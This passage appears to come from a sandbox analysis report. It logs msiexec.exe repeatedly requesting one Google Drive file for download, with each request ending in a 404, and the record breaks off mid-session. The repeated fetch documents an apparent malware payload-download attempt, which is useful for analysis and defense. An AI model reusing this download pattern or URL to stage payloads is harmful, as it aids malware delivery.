minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="K5BcdejIi4tEwvMrg04Zow">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	51653	142.250.181.238	443	1472	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 03:35:39 UTC	418	OUT	GET /uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=520=UJgGxGwMnnh5Hkc-ik75gM3Svtpnr--_rN73_GXA07ErE3YsRuTenh60_uQGSQIhgo_KvKCfneQuxRU7gT9EmgpqfdaGl7US166Um97Q4F_7dXrNAey74Z47wNbvT3rsGVEFFuTM4llM91_vUTwgDg6mTDdEtajw_W6LHyfOsZXJKGG4NpxgOS0p
2025-01-11 03:35:40 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 03:35:40 GMT Location: https://drive.usercontent.google.com/download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download Strict-Transport-Security: max-age=31536000 Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy: script-src 'nonce-GUZ6M4Zs3FMI9gBunfeJSQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Cross-Origin-Opener-Policy: same-origin Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	51654	142.250.185.225	443	1472	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 03:35:40 UTC	460	OUT	GET /download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=UJgGxGwMnnh5Hkc-ik75gM3Svtpnr--_rN73_GXA07ErE3YsRuTenh60_uQGSQIhgo_KvKCfneQuxRU7gT9EmgpqfdaGl7US166Um97Q4F_7dXrNAey74Z47wNbvT3rsGVEFFuTM4llM91_vUTwgDg6mTDdEtajw_W6LHyfOsZXJKGG4NpxgOS0p
2025-01-11 03:35:41 UTC	1844	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFIdbgTHA9CgGaP4y0slLmXOP4oD-biiFoJmYwnJH5eHjexTjJIiwBXQs0QZJHIGPUHENY2D Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 03:35:41 GMT Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-5uS7Hw1NVV_5mLJLt-MUgw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2025-01-11 03:35:41 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 45 66 65 5f 56 41 6f 57 67 75 30 63 30 47 62 6e 4a 48 39 46 69 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Efe_VAoWgu0c0GbnJH9FiA">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.5	51655	142.250.181.238	443	1472	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 03:35:51 UTC	418	OUT	GET /uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=520=UJgGxGwMnnh5Hkc-ik75gM3Svtpnr--_rN73_GXA07ErE3YsRuTenh60_uQGSQIhgo_KvKCfneQuxRU7gT9EmgpqfdaGl7US166Um97Q4F_7dXrNAey74Z47wNbvT3rsGVEFFuTM4llM91_vUTwgDg6mTDdEtajw_W6LHyfOsZXJKGG4NpxgOS0p
2025-01-11 03:35:52 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 03:35:52 GMT Location: https://drive.usercontent.google.com/download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download Strict-Transport-Security: max-age=31536000 Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Opener-Policy: same-origin Content-Security-Policy: script-src 'nonce-DOW48a-4oy5ggIWn53OA8w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.5	51656	142.250.185.225	443	1472	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 03:35:53 UTC	460	OUT	GET /download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=UJgGxGwMnnh5Hkc-ik75gM3Svtpnr--_rN73_GXA07ErE3YsRuTenh60_uQGSQIhgo_KvKCfneQuxRU7gT9EmgpqfdaGl7US166Um97Q4F_7dXrNAey74Z47wNbvT3rsGVEFFuTM4llM91_vUTwgDg6mTDdEtajw_W6LHyfOsZXJKGG4NpxgOS0p
2025-01-11 03:35:53 UTC	1844	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFIdbgQA-T4nkc0BwFfAmhjw1HDWsVgNcWHDNM_MGPC7LSnBm9gUTcmY_OboYX6c0htUiVlz Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 03:35:53 GMT Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-DQvb78jy30Klll2hUbmjYw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2025-01-11 03:35:53 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 77 62 62 39 55 74 49 4e 5f 71 65 50 69 56 6f 4e 47 6b 4d 5f 76 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="wbb9UtIN_qePiVoNGkM_vA">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.5	51657	142.250.181.238	443	1472	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 03:36:04 UTC	418	OUT	GET /uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=520=UJgGxGwMnnh5Hkc-ik75gM3Svtpnr--_rN73_GXA07ErE3YsRuTenh60_uQGSQIhgo_KvKCfneQuxRU7gT9EmgpqfdaGl7US166Um97Q4F_7dXrNAey74Z47wNbvT3rsGVEFFuTM4llM91_vUTwgDg6mTDdEtajw_W6LHyfOsZXJKGG4NpxgOS0p
2025-01-11 03:36:04 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 03:36:04 GMT Location: https://drive.usercontent.google.com/download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download Strict-Transport-Security: max-age=31536000 Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-udvaNfmo0aUImK-53Z--9Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.5	51658	142.250.185.225	443	1472	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 03:36:05 UTC	460	OUT	GET /download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=UJgGxGwMnnh5Hkc-ik75gM3Svtpnr--_rN73_GXA07ErE3YsRuTenh60_uQGSQIhgo_KvKCfneQuxRU7gT9EmgpqfdaGl7US166Um97Q4F_7dXrNAey74Z47wNbvT3rsGVEFFuTM4llM91_vUTwgDg6mTDdEtajw_W6LHyfOsZXJKGG4NpxgOS0p
2025-01-11 03:36:05 UTC	1851	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFIdbgSkIiOjvxOkBjcDTPnVKwR1zVPNEMCwovW_WM8ns11gicG-RN5xMMcgMhxCiO9rpnlDjwfRV0s Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 03:36:05 GMT Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy: script-src 'nonce-mS0Zh3JswFLM1R3f8BCaNQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2025-01-11 03:36:05 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 44 4a 56 50 46 71 4f 44 5f 48 34 6a 4d 6c 6e 6c 76 70 53 36 4b 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="DJVPFqOD_H4jMlnlvpS6Kg">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.5	51659	142.250.181.238	443	1472	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 03:36:16 UTC	418	OUT	GET /uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=520=UJgGxGwMnnh5Hkc-ik75gM3Svtpnr--_rN73_GXA07ErE3YsRuTenh60_uQGSQIhgo_KvKCfneQuxRU7gT9EmgpqfdaGl7US166Um97Q4F_7dXrNAey74Z47wNbvT3rsGVEFFuTM4llM91_vUTwgDg6mTDdEtajw_W6LHyfOsZXJKGG4NpxgOS0p
2025-01-11 03:36:16 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 03:36:16 GMT Location: https://drive.usercontent.google.com/download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download Strict-Transport-Security: max-age=31536000 Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-Z4rdJbK0gw9gcVJJjzG1vA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.5	51660	142.250.185.225	443	1472	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 03:36:17 UTC	460	OUT	GET /download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=UJgGxGwMnnh5Hkc-ik75gM3Svtpnr--_rN73_GXA07ErE3YsRuTenh60_uQGSQIhgo_KvKCfneQuxRU7gT9EmgpqfdaGl7US166Um97Q4F_7dXrNAey74Z47wNbvT3rsGVEFFuTM4llM91_vUTwgDg6mTDdEtajw_W6LHyfOsZXJKGG4NpxgOS0p
2025-01-11 03:36:17 UTC	1851	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFiumC4oDPtqbBoUsR4Mti_r6LvSWQtk68nLrRhg3LHjZYzY7SOrtQ4Za-75HCvNp4oy25NytQkgZg4 Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 03:36:17 GMT Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-Amm1HqpBSH0d6hU5XqFs6A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2025-01-11 03:36:17 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 72 7a 6d 31 49 6e 6c 56 7a 57 61 45 41 54 37 77 36 74 43 31 38 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="rzm1InlVzWaEAT7w6tC18g">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.5	51661	142.250.181.238	443	1472	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
